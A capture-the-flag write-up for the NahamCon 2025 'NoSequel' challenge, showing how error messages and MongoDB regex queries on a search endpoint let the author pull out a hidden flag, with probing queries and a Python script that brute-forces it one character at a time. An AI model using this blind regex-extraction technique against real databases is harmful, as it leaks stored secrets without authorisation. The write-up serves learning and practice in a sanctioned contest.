web

NoSequel Writeup

Nahamcon 2025

Solved by thewhiteh4t

In this challenge we had to extract the flag from a movie DB using MongoDB and a search function, as the name suggests first thought was NoSQL injections, but that was not needed as you will see.

An example search query was given :

title: Inception {"year": {"$gt": 1990}} title: {$regex: "The"}

Two collections were available in the dropdown and our flag is in Flags collection, because it’s a CTF. We can figure out correct query string for Flags collection using the errors and eventually build a working query :

Query: a
Error: Only regex queries are supported on the flag collection

Query: {$regex: "The"}
Error: Only regex on 'flag' field is supported

Query: flag: {$regex: "The"}
Result:  No results found matching your search criteria.

Query: flag: {$regex: "flag"}
Result: Pattern matched

Query: flag: {$regex: "flag{"}
Result: Pattern matched

Query: flag: {$regex: "flag["}
Result: No results found matching your search criteria.

So by abusing the regex filter we can extract the flag character by character, to automate the process I wrote a python script, the script will bruteforce each character and when it gets expected response, it will update the flag variable and continue with the next character and so on until it extracts all 32 characters of the flag

#!/usr/bin/env python3

import string
import requests

url = 'http://challenge.nahamcon.com:31735/search'
flag = 'flag{'
charset = []
charset.extend(list(string.digits))
charset.extend(list(string.ascii_lowercase))

while len(flag) != 37:
        for char in charset:
                payload = {
                        'query': 'flag: {$regex: "^' + flag + char + '"}',
                        'collection': 'flags'
                }

                rqst = requests.post(url, data=payload)
                output = rqst.text

                if 'Pattern matched' in output:
                        flag += char
                        print(flag)

print(flag + '}')

As you can see the script generates brute force art with the flag at the end :

Key Learning and Takeaways

  • Error Messages are Your Friend : When trying to figure out the right query for the “Flags” collection, the server’s error messages were gold. They guided us, bit by bit, to understand the exact syntax and structure it expected.
  • The Power of Regex : The search function supported regular expressions, and that’s where the magic happened. Instead of trying to guess the whole flag at once, we could use regex to ask the database, Does the flag start with ‘a’ ? How about ‘b’ ? Does the next character match ‘c’ ?
  • Automation : This challenge screamed for a script. Our Python script systematically found each character, confirming it, and then moving to the next, saving lot of time.
Published on : 31 May 2025